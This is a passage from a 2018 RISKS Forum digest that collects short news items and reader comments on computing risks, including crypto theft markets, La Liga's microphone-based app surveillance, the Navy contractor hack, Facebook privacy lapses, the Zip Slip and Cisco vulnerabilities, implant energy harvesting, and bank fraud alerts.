    $1.1 billion has been stolen in cryptocurrency-related thefts, and
    approximately 12,000 marketplaces in the underbelly of the Internet are
    fueling this trend.

    In total, there are roughly 34,000 products and services on sale that are
    related to cryptocurrency theft, ranging from just over a dollar in price to
    $224, with an average cost of around $10.

    "The available dark web marketplaces represent a $6.7 million illicit
    economy built from cryptocurrency-related malware development and sales,"
    the researchers say.

    ------------------------------

    Date: Sun, 10 Jun 2018 18:06:14 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Quebec Halts Bitcoin Mining Power Requests Amid Booming Demand
    (Bloomberg)

    Hydro-Quebec will temporarily stop processing requests from cryptocurrency
    miners so that it can continue to fulfill its obligations to supply
    electricity to the entire province.

    Canada's biggest electric utility is facing unprecedented demand from
    blockchain companies that exceeds Hydro-Quebec's short- and medium-term
    capacity, according to a statement Thursday. In the coming days,
    Hydro-Quebec will file an application to the province's energy regulator
    proposing a selection process for blockchain industry projects.

    Hydro-Quebec has been courting cryptocurrency miners in recent months in a
    bid to soak up surplus energy from dams in northern Quebec. Power rates in
    the province are the lowest in North America, both for consumers and
    industrial customers.

    https://www.msn.com/en-us/news/mark...power-requests-amid-booming-demand/ar-AAylZv3

    Always risky, getting what you want.

    Then, there's this...
    https://techcrunch.com/2018/06/08/ibms-new-summit-supercomputer-for-the-doe-delivers-200-petaflops/

    ...which one commenter somewhere suggests should be used to mine bitcoins.
    Besides petaflop ratings, we need potential kWh/bitcoin comparisons.

    ------------------------------

    Date: Sun, 10 Jun 2018 21:01:19 -0400
    From: Jose Maria Mateos <ch...@rinzewind.org>
    Subject: The Spanish Liga uses the phone microphone of millions of fans
    to spy on bars (El Diario)

    Original article (in Spanish):
    https://www.eldiario.es/tecnologia/Liga-Futbol-microfono-telefono-aficionados_0_780772124.html

    Automated translation:
    https://translate.google.com/transl...lefono-aficionados_0_780772124.html&edit-text

    The Liga de Fútbol Profesional, the body that runs the most important
    sports competition in Spain, is using mobile phones of football fans to spy
    on bars and other public establishments that put matches for their
    clients. Millions of people in Spain have this application on their phone,
    which accumulates more than 10 million downloads, according to data from
    Google and Apple.

    All of these people can become undercover informants for La Liga and the
    owners of football television broadcasting rights. If they give their
    consent for the app to use the device's microphone (which is common in many
    applications), they are actually giving permission for La Liga to remotely
    activate the phone's microphone and try to detect if what it sounds like is
    a bar or public establishment where a football match is being projected
    without paying the fee established by the chains that own the broadcasting
    rights. In addition, use the geolocation of the phone to locate exactly
    where that establishment is located.

    ------------------------------

    Date: Fri, 8 Jun 2018 17:10:09 -0400
    From: Mark Rockman <user...@mdrsesco.biz>
    Subject: Navy Contractor Hacked: Reams of Secret Documents Taken (WashPo)

    *The Washington Post* reports "Chinese government hackers have compromised
    the computers of a Navy contractor, stealing massive amounts of highly
    sensitive data related to undersea warfare - including secret plans to
    develop a supersonic anti-ship missile for use on U.S. submarines by 2020,
    according to American officials. " Gee. Do you think connecting secret
    documents to the Internet is wise? Good thing the Manhattan Project only
    had a Russian spy in their midst. Otherwise the Soviets may have stolen
    nuclear secrets and got the bomb before 1949.

    https://www.washingtonpost.com/worl...8eb28bc52b1_story.html?utm_term=.e6cf621eb36c

    [Also noted by Jose Maria Mateos. PGN]

    ------------------------------

    Date: Thu, 7 Jun 2018 07:50:14 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: G Suite leaks in 10,000+ orgs: Google UX blamed, fury at no-bug
    defense (TechBeacon)

    via NNSquad
    https://techbeacon.com/g-suite-leaks-10000-orgs-google-ux-blamed-fury-no-bug-defense

    People keep misconfiguring G Suite to leak their companies' private
    data. An estimated 10,000 or more organizations are affected. Google
    denies it's a bug, passive-aggressively telling people to RTFM. But that's
    not the point, is it? Given the scale of the problem, shouldn't la GOOG be
    fixing an obvious admin UX problem?

    When you blame the users in situations like this, you've already lost the
    argument.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:28:37 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Password reset flaw at Internet giant Frontier allowed account
    takeovers" (Zack Whittaker)

    Zack Whittaker for Zero Day (8 Jun 2018)
    Password reset flaw at Internet giant Frontier allowed account takeovers
    A two-factor code used to reset an account password could be easily bypassed.
    https://www.zdnet.com/article/password-reset-flaw-at-frontier-allowed-account-takeovers/

    opening text:

    A bug in how cable and Internet giant Frontier reset account passwords
    allowed anyone to take over user accounts.

    The vulnerability, found by security researcher Ryan Stevenson, allows a
    determined attacker to take over an account with just a username or email
    address. And a few hours worth of determination, an attacker can bypass the
    access code sent during the password reset process.

    ------------------------------

    Date: Mon, 11 Jun 2018 10:04:32 -0600
    From: "Matthew Kruk" <mkr...@gmail.com>
    Subject: Why a DNA data breach is much worse than a credit card leak
    (The Verge)

    https://www.theverge.com/2018/6/6/17435166/myheritage-dna-breach-genetic-privacy-bioethics

    ------------------------------

    Date: Fri, 08 Jun 2018 20:31:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Facebook gave some companies extended access to user data"
    (Stephanie Condon)

    Stephanie Condon for Between the Lines (ZDNet), 8 Jun 2018
    Facebook's acknowledgement of these agreements is the latest incident to
    shed light on the way the company has shared user data in ways users are
    unlikely to understand.
    https://www.zdnet.com/article/facebook-gave-some-companies-extended-access-to-user-data/

    opening text:

    In the latest revelation about Facebook's data-sharing practices, the social
    media giant acknowledged Friday that it gave certain companies extended,
    special access to user data in 2015 -- data that was already off limits to
    most developers.

    ------------------------------

    Date: Thu, 7 Jun 2018 13:39:07 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Facebook bug made up to 14 million users' posts public for days
    (WiReD)

    via NNSquad
    https://www.wired.com/story/facebook-bug-14-million-users-posts-public/

    FACEBOOK HAS FOUND itself the subject of another privacy scandal, this
    time involving privacy settings. A glitch caused up to 14 million Facebook
    users to have their new posts inadvertently set to public, the company
    revealed Thursday.

    "Private" posts that turned out to be public. Pretty much a worst case
    scenario.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:21:00 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco fixes critical bug that exposed networks to hackers"
    (Zack Whittaker)

    Zack Whittaker, ZDNet, 7 Jun 2018
    The bug had a rare 9.8 out of 10 score on the common vulnerability
    severity rating scale.
    https://www.zdnet.com/article/cisco-fixes-critical-bug-that-exposed-networks-to-hackers/

    opening text:

    A "critical"-rated bug in one of Cisco's network access management devices
    could have allowed hackers to remotely break into corporate networks.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:34:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Meet Norman, the world's first 'psychopathic' AI"
    (Charlie Osborne)

    Charlie Osborne for Between the Lines (ZDNet) 7 Jun 2018
    While you see flowers, Norman sees gunfire.
    https://www.zdnet.com/article/meet-norman-the-worlds-first-psychopathic-ai/

    selected text:

    Researchers at the Massachusetts Institute of Technology (MIT) have
    developed what is likely a world first -- a "psychopathic" artificial
    intelligence (AI).

    Norman is an AI system trained to perform image captioning, in which deep
    learning algorithms are used to generate a text description of an image.

    However, after plundering the depths of Reddit and a select subreddit
    dedicated to graphic content brimming with images of death and destruction,
    Norman's datasets are far from what a standard AI would be exposed to.

    The results are disturbing, to say the least.

    In one inkblot test, a standard AI saw "a black and white photo of a red and
    white umbrella," while Norman saw "man gets electrocuted while attempting to
    cross busy street."

    ------------------------------

    From: Richard M Stein <rms...@ieee.org>
    Date: Tue, 5 Jun 2018 06:21:03 -0700
    Subject: Should We Always Trust What We See in Satellite Images?
    (Scientific American)

    https://www.scientificamerican.com/article/should-we-always-trust-what-we-see-in-satellite-images/

    The author argues that an "on the ground" confirmation is a wise precaution
    to verify imagery content. Image processing algorithms can render misleading
    impressions which affect major decisions.

    "One example of the misuse of remotely sensed data was in 2003, when
    satellite images were used as evidence of sites of weapons of mass
    destruction in Iraq. These images revealed what were identified as active
    chemical munitions bunkers and areas where earth had been graded and moved
    to hide evidence of chemical production. This turned out not to be the
    case."

    "Trust but verify" remains a wise precaution to follow when analyzing
    satellite imagery.

    ------------------------------

    Date: Tue, 12 Jun 2018 13:20:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The NSA Just Released 136 Historical Propaganda Posters
    (Motherboard)

    https://motherboard.vice.com/en_us/article/43548d/nsa-historical-propaganda-posters-foia

    ------------------------------

    Date: Fri, 08 Jun 2018 06:56:43 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Unproven facial-recognition companies target schools, promising an
    end to shootings (WashPo)

    http://www.washingtonpost.com/busin...ory.html?noredirect=on&utm_term=.3fccfa98bcd2

    "Although facial recognition remains unproven as a deterrent to school
    shootings, the specter of classroom violence and companies intensifying
    marketing to local education officials could cement the more than 130,000
    public and private schools nationwide as one of America's premier testing
    grounds -- both for the technology's abilities and for public acceptance
    of a new generation of mass surveillance."

    Mass shootings at schools in the US, while statistically rare compared to
    other gun-related deaths (suicide, for instance), are horrifying events. A
    set of companies are pitching facial recognition technology as a bromide and
    deterrent, though they are coy to explain how their software stacks function
    or enable deterrence. Exploiting fear and anxiety are long-practiced sales
    techniques.

    ------------------------------

    Date: Wed, 6 Jun 2018 20:30:31 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: The Zip Slip vulnerability: what you need to know (Naked Security)

    Thanks to SRI's Steven Cheung for spotting this one.

    A fun vulnerability that uses zip files to overwrite files

    https://nakedsecurity.sophos.com/2018/06/06/the-zip-slip-vulnerability-what-you-need-to-know/

    ------------------------------

    Date: Fri, 8 Jun 2018 12:29:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: All the people Apple just pissed off to better protect your privacy
    (Fast Company)

    When Apple previewed the upcoming iOS 12 and MacOS Mojave at this week's
    WWDC keynote,
    http://www.fastcompany.com/40578098/watch-apple-wwdc-livestream-live-coverage

    The killer new features that got both developers and users most excited were
    the ones you'd would expect: the visually stunning Dark Mode on MacOS, the
    insanely customizable Memojis on iOS, FaceTime group-calling features on
    both platforms, massive improvements to Siri, and Apple's all-new Screen
    Time digital health tracking tools.

    <http://www.fastcompany.com/40580992/macos-mojave-brings-dark-mode-better-privacy-and-more-ios-ideas>
    <http://www.fastcompany.com/40580906/apples-latest-animoji-you>
    <http://www.fastcompany.com/40580873/siri-wants-to-automate-your-life-with-shortcuts>
    <http://www.fastcompany.com/40581638...ome-real-responsible-use-features-but-why-now>

    All those features deserved the applause they got from the crowd. But it
    was other updates -- definitely less sexy and headline-grabbing -- that set
    Apple apart from other technology giants. I'm talking about the new privacy
    features built into both iOS 12 and MacOS Mojave that make it so much harder
    for other parties to get at your personal information.
    https://www.fastcompany.com/4058169...ust-pissed-off-to-better-protect-your-privacy

    ------------------------------

    Date: Fri, 8 Jun 2018 13:40:11 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Recounting 'Horror Stories' Over Guitar Center's Warranties (NYT)

    https://www.nytimes.com/2018/06/07/business/guitar-center-warranty.html

    Former employees and customers at the giant music retailer described
    problems with how it sells protection plans, particularly in Puerto Rico.

    ------------------------------

    Date: Fri, 8 Jun 2018 13:41:23 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Add Bryan Colangelo to the long list who have been burned by social
    media (ESPN)

    http://www.espn.com/nba/story/_/id/...-line-sports-figures-run-trouble-social-media

    ------------------------------

    Date: Tue, 5 Jun 2018 10:27:01 -0400
    From: John Ohno <john...@gmail.com>
    Subject: Microsoft, Github, & distributed revision control (Medium)

    Originally posted here:
    3Dhttps://medium.com/%40enkiv2/microsoft-github-and-distributed-revision-control-c563b5e98d17

    Microsoft, Github, and distributed revision control

    People legitimately criticize Github for creating artificial centralization
    of open source software & having a dysfunctional internal culture, and for
    being a for-profit company. Microsoft's acquisition may not make any of
    these things worse, & won't make them better. But, there's a really specific
    & practical reason people not already boycotting github have begun to
    consider it in response to the Microsoft acquisition: Microsoft's history of
    using deals, acquisitions, & standards committees as anticompetitive tools.

    Github was never going to do much of anything beside host your projects, and
    since hosting your projects is its main business, it's not going to do nasty
    things like delete them. Microsoft, however, is absolutely willing to do
    that kind of thing if they decide they can get away with it. History bears
    this out -- some of it recent. Microsoft hasn't been able to do it to the
    likes of IBM or Netscape since the 90s, but only because their complacency
    over the PC market has prevented them from being able to successfully branch
    out into phones or servers; however, they have been happily performing their
    embrace-extend-exterminate tactic on open source projects for the past
    fifteen years.

    (Note: If Github got as big as Microsoft & had side hustles as profitable,
    they would do the same thing. This isn't about particular organizations
    being evil -- capitalism forces organizations to act unethically and
    illegally by punishing those unwilling to break the law.)

    People concerned about open source software distribution being centralized
    under the aegis of unreliable for-profit companies have been boycotting
    Github & Gitlab for years, and Google Code and Sourceforge before that.
    They've also been working on alternatives to central repositories.

    Named data networking goes beyond simply ensuring that the owner of the
    hostname is not a for-profit company (liable to throw out your data as soon
    as they decide that it'll make them money to do so). Instead, DNS as a
    single point of failure goes away entirely, along with reliance on data
    centers.

    If you're considering migrating away from Github -- even if the recent news
    merely reminded you of problems Github has had for years -- take this
    opportunity to migrate your repository to git-ssb or git-ipfs, instead of
    moving to another temporary host-tied third party thing like gitlab or
    bitbucket. Your commits are already identified by hashes, so why not switch
    to hashes entirely & use an NDN/DHT system? That way, there's no third party
    that could take down your commits if it goes down. The entire DNS system
    could die permanently & it wouldn't interrupt your development.

    ------------------------------

    Date: Mon, 11 Jun 2018 16:54:09 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: How the body could power pacemakers and other implantable devices
    (Charles Q. Choi)

    [From ocean wave motions to lungs! Great idea. PGN]

    Charles Q. Choi, *The Washington Post*, 9 Jun 2018
    http://www.washingtonpost.com/natio...d287b0-5559-11e8-a551-5b648abe29ef_story.html

    In I Sing the Body Electric, poet Walt Whitman waxed lyrically about the
    action and power of beautiful, curious, breathing, laughing flesh. More
    than 150 years later, MIT materials scientist and engineer Canan Dagdeviren
    and colleagues are giving new meaning to Whitman's poem with a device that
    can generate electricity from the way it distorts in response to the beating
    of the heart.

    Despite tremendous technological advances, a key drawback of most wearable
    and implantable devices is their batteries, whose limited capacities
    restrict their long-term use. The last thing you want to do when a pacemaker
    runs out of power is to open up a patient just for battery replacement.

    The solution may rest inside the human body -- rich in energy in its
    chemical, thermal and forms.

    The bellows-like motions that a person makes while breathing, for example,
    can generate 0.83 watts of power; the heat from a body, up to 4.8 watts; and
    the motions of the arms, up to 60 watts. That's not nothing when you
    consider that a pacemaker needs just 50 millionths of a watt to last for
    seven years, a hearing aid needs a thousandth of a watt for five days, a
    smartphone requires one watt for five hours.

    Increasingly, Dagdeviren and others are investigating a plethora of ways
    that devices could make use of these inner energy resources and are testing
    such wearable or implantable devices in animal models and people.

    Good vibrations

    One energy-harvesting strategy involves converting energy from vibrations,
    pressure and other mechanical stresses into electrical energy. This
    approach, producing what is known as piezoelectricity, is often used in
    loudspeakers and microphones.

    To take advantage of piezoelectricity, Dagdeviren and colleagues have
    developed flat devices that can be stuck onto organs and muscles such as the
    heart, lungs and diaphragm. Their mechanical properties are similar to
    whatever they are laminated onto, so they don't hinder those tissues when
    they move.

    So far, such devices have been tested in cows, sheep and pigs, animals with
    hearts roughly the same size as those of people. ``When these devices
    mechanically distort, they create positive and negative charges, voltage and
    current -- and you can collect this energy to recharge batteries, You can
    use them to run biomedical devices like cardiac pacemakers instead of
    changing them every six or seven years when their batteries are depleted.''

    Scientists are also developing wearable piezoelectric energy harvesters that
    can be worn on joints such as the knee or elbow, or in shoes, trousers or
    underwear. People could generate electricity for electronics whenever they
    walk or bend their arms.

    Body heat

    A different energy-harvesting approach uses thermoelectric materials to
    convert body heat to electricity. ``Your heart beats more than 40 million
    times a year,'' Dagdeviren notes. All that energy is dissipated as heat in
    the body -- it's a rich potential source to capture for other uses.

    Thermoelectric generators face key challenges. They rely on temperature
    differences, but people usually keep a fairly constant temperature
    throughout their bodies, so any temperature differences found within are
    generally not dramatic enough to generate large amounts of electricity. But
    this is not a problem if the devices are exposed to relatively cool air in
    addition to the body's continuous warmth.

    Scientists are exploring thermo-electric devices for wearable purposes, such
    as powering wristwatches. In principle, the heat from a human body can
    generate enough electricity to power wireless health monitors, cochlear
    implants and deep-brain stimulators to treat disorders such as Parkinson's
    disease.

    Static and dynamic

    Scientists have also sought to use the same effect behind everyday static
    electricity to power devices. When two different materials repeatedly
    collide with, or rub against, one another, the surface of one material can
    steal electrons from the other, accumulating a charge, a phenomenon known as
    triboelectricity. Nearly all materials, both natural and synthetic, are
    capable of creating triboelectricity, giving researchers a wide range of
    choices for designing gadgets.

    Nanotechnologist Zhong Lin Wang of Georgia Tech:

    ``The more I work with triboelectricity, the more exciting it gets, and
    the more applications it might have. I can see myself devoting the next
    20 years to it.''

    ------------------------------

    Date: Mon, 11 Jun 2018 11:58:20 -0500
    From: David Strom via WebInformant <webinf...@list.webinformant.tv>
    Subject: Having better risk-based analysis for your banks and credit cards

    David Strom's Web Informant, 11 Jun 2018
    [TNX to Gabe Goldberg]

    When someone tries to steal money from your bank or credit card accounts,
    these days it is a lot harder, thanks to a number of technologies. I
    recently personally had this situation. Someone tried to use my credit card
    on the other side of Missouri on a Sunday afternoon. Within moments, I got
    alerts from my bank, along with a toll-free number to call to verify the
    transactions. In the heat of the moment, I dialed the number and started
    talking to my bank's customer service representatives. Then it hit me: what
    if I were being phished? I told the person that I was going to call them
    back, using the number on the back of my card. Once I did, I found out I was
    talking to the right people after all, but still you can't be too careful.

    This heat-of-the-moment reaction is what the criminals count on, and how
    they prey on your heightened emotional state. In my case, I was well into my
    first call before I started thinking more carefully about the situation, so
    I could understand how phishing attacks can often work, even for experienced
    people.

    To help cut down on these sorts of exploits, banks use a variety of
    risk-based or adaptive authentication technologies that monitor your
    transactions constantly, to try to figure out if it really is you doing them
    or someone else. In my case, the pattern of life didn't fit, even though it
    was a transaction taking place only a few hundred miles away from where I
    lived. Those of you who travel internationally probably have come across
    this situation: if you forget to tell your bank you are traveling, your
    first purchase in a foreign country may be declined until you call them and
    authorize it. But now the granularity of what can be caught is much finer,
    which was good news for me.

    These technologies can take several forms: some of them are part of identity
    management tools or multi-factor authentication tools, others come as part
    of regular features of cloud access security brokers. They aren't
    inexpensive, and they take time to implement properly. In a story I wrote
    last month for CSOonline
    <https://www.csoonline.com/article/3...me-an-essential-security-tool.html#tk.twt_cso
    I discuss what IT managers need to know to make the right purchasing
    decision.

    In that article, I also talk about these tools and how they have matured
    over the past few years. As we move more of our online activity to mobiles
    and social networks, hackers are finding ways at leveraging our identity in
    new and sneaky ways. One-time passwords that are being sent to our phones
    can be more readily intercepted, using the knowledge that we broadcast on
    our social media. And to make matters worse, attackers are also getting
    better at conducting blended attacks that can cut across a website, a mobile
    phone app, voice phone calls, and legacy on-premises applications.

    Of course, all the tech in the world doesn't help if your bank can't respond
    quickly when you uncover some fraudulent activity. Criminals specifically
    targeted a UK bank that was having issues with switching over its computer
    systems last month knowing that customers would have a hard time getting
    through to its customer support call centers. The linked article documents
    how one customer waited on hold for more than four hours, watching while
    criminals took thousands of pounds out of his account. Other victims were
    robbed of five and six-figure sums after falling for phishing messages
    that asked them to input their login credentials.

    <https://www.welivesecurity.com/2018/05/28/scammers-drain-mans-bank-account-fraud-hotline/

    The moral of the story: don't panic when you get a potentially dire fraud
    alert message. Take a breath, take time to think it through. And call your
    bank when in doubt.

    Comments always welcome here: http://blog.strom.com/wp/?p=6568

    ------------------------------

    Date: Tue, 12 Jun 2018 15:44:00 -0400
    From: Phil Smith III <phsiii@gmail.
    Subject: Having better risk-based analysis for your banks and credit cards

    What continues to bug me is that banks don't ask, ``Did you call this number
    from the back of your card?'' Those of us who did will say ``Of course'',
    but we aren't the ones to worry about. I've gotten calls from banks asking
    me about transactions; when I said ``I will call you back'', they said
    ``Fine, of course.'' But they SHOULD have started the call with ``This is
    TBTF Bank, calling about a questionable transaction on your Visa card. To
    ensure that this is a legitimate conversation, please call us back at the
    number on the back of your card.''

    ------------------------------

    Date: Mon, 11 Jun 2018 22:22:41 +0100
    From: Chris Drewe <e76...@yahoo.co.uk>
    Subject: Re: Securing Elections (Shapir, R 30 71)

    This is similar in Britain (not that I'm a constitutional expert).
    Candidates stand for election in each electoral area, and we vote for which
    one we want to serve as our Member of Parliament. The winner is the one
    with most votes -- the 'first-past-the-post' system. Usually one of the big
    parties gets a majority of MPs so forms the government directly, but
    sometimes (as at the present time) the biggest party needs a support
    agreement with a smaller party to get a majority. While this may seem like
    an elected dictatorship, it's obvious who is in charge, and we get the
    chance to vote them out at the next election.

    By contrast, as I understand it, mainland European countries often have a
    large number of small parties so coalitions are the usual arrangement. The
    problem here is that much policy-making may be hidden in behind-the-scenes
    deals between parties, i.e. a party may have to support something that it
    doesn't want to get something that it does, or vice-versa. This can give
    unstable governments as in Italy as the original poster said, or the
    opposite when an election just changes a few of the elected representatives
    and everything continues as as before. The EU seems to be based on the
    European model, with a large bureaucracy notionally governed by a small,
    unfocused elected assembly, which may account for the fractious relationship
    between the UK and the EU; indeed, a cynic such as myself may feel that the
    aim is to create the impression of democracy rather than giving power to
    voters.

    As British MPs are elected regionally, there's no direct correlation between
    the total number of votes gained by parties and the numbers of their MPs, so
    there are periodic campaigns to adopt some kind of proportional
    representation system, though this brings various other problems. A bigger
    problem is potential voter-identity fraud, a frequent topic in RISKS.
    There's talk of requiring voters to show some proof of identity at polling
    stations, but what, as there's no particular official UK identity document?

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.72
    ************************